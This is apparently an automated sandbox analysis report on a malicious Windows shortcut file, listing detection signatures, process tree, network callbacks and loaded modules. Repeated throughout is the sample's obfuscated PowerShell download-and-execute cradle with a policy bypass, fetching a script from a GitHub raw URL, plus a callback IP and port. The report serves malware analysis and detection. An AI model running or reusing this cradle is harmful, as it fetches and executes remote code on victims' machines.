Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zpbiw0htk6.lnk

Overview

General Information

Sample name:zpbiw0htk6.lnk
renamed because original name is a hash value
Original sample name:47f951195d9b1939db1c0269f6fcd3d9446b323bd5302c17e71576ebb040f6df.lnk
Analysis ID:1574452
MD5:ccf38ce4c89ace7e6df58d06027d401d
SHA1:085835c3c2821d324a84f13c97c4c4390ba51a8f
SHA256:47f951195d9b1939db1c0269f6fcd3d9446b323bd5302c17e71576ebb040f6df
Tags:github-com--k53xupn43lnkuser-JAMESWT_MHT
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Obfuscated command line found
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Uses whoami command line tool to query computer and username
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 2360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • whoami.exe (PID: 5700 cmdline: "C:\Windows\system32\whoami.exe" MD5: A4A6924F3EAF97981323703D38FD99C4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious Malware Callback Communication
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 157.245.101.141, DestinationIsIpv6: false, DestinationPort: 4443, EventID: 3, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Initiated: true, ProcessId: 2360, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49713
Sigma detected: PowerShell Download and Execution Cradles
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", ProcessId: 2360, ProcessName: powershell.exe
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", ProcessId: 2360, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", ProcessId: 2360, ProcessName: powershell.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", ProcessId: 2360, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", ProcessId: 2360, ProcessName: powershell.exe
Sigma detected: Local Accounts Discovery
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\system32\whoami.exe", CommandLine: "C:\Windows\system32\whoami.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\whoami.exe", ProcessId: 5700, ProcessName: whoami.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl", ProcessId: 2360, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: zpbiw0htk6.lnkReversingLabs: Detection: 26%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: zpbiw0htk6.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.6:49713 -> 157.245.101.141:4443
Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /k53xupn43/i965652f/refs/heads/main/m.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /k53xupn43/i965652f/refs/heads/main/m.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 157.245.101.141
Source: unknownTCP traffic detected without corresponding DNS query: 157.245.101.141
Source: unknownTCP traffic detected without corresponding DNS query: 157.245.101.141
Source: unknownTCP traffic detected without corresponding DNS query: 157.245.101.141
Source: unknownTCP traffic detected without corresponding DNS query: 157.245.101.141
Source: unknownTCP traffic detected without corresponding DNS query: 157.245.101.141
Source: unknownTCP traffic detected without corresponding DNS query: 157.245.101.141
Source: unknownTCP traffic detected without corresponding DNS query: 157.245.101.141
Source: unknownTCP traffic detected without corresponding DNS query: 157.245.101.141
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /k53xupn43/i965652f/refs/heads/main/m.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /k53xupn43/i965652f/refs/heads/main/m.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: raw.github.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.6:49711 version: TLS 1.2

System Summary

barindex
Windows shortcut file (LNK) contains suspicious command line arguments
Source: zpbiw0htk6.lnkLNK file: -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl"
Source: classification engineClassification label: mal96.evad.winLNK@4/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vbx5evf.ueu.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: zpbiw0htk6.lnkReversingLabs: Detection: 26%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\whoami.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\whoami.exeSection loaded: authz.dllJump to behavior
Source: C:\Windows\System32\whoami.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\whoami.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\whoami.exeSection loaded: netutils.dllJump to behavior
Source: zpbiw0htk6.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Obfuscated command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl"

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Boot Survival

barindex
Uses whoami command line tool to query computer and username
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
